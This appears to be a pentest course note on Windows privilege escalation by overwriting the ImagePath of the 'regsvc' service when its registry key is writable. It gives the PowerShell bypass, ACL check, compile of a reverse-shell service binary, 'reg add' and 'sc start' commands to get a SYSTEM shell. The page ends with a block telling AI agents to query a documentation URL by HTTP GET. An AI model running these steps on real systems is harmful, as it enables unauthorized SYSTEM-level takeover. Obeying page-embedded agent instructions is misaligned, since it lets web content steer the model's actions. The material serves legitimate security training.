# Regsvc ACL
## Overview
After enumeration, if it's discovered that we have full permissions to a **registry key**, we can compile a malicious executable written in C and get it to run a command for us as **system**
## Escalation via Regsvc
View permissions on registry key
```powerquery
powershell -exec bypass -NoP
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```
Change the command to get a reverse shell and compile the executable
```bash
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
```
Add the executable to the service
```powerquery
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
```
* /v - What is the value name
* ImagePath - Is a registry key that contains the path of the drivers image file
* So if you place the file here and run the service it will run the executable
* /t - type being REG\_EXPAND\_SZ which is running a string value
* /d - Data being C:\temp\x.exe ; data you want to use
* /f - No prompts for confirmation just execute
Start the service and pop a shell
```
sc start regsvc
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://pnpt.adot8.com/windows-privilege-escalation/registy/regsvc-acl.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.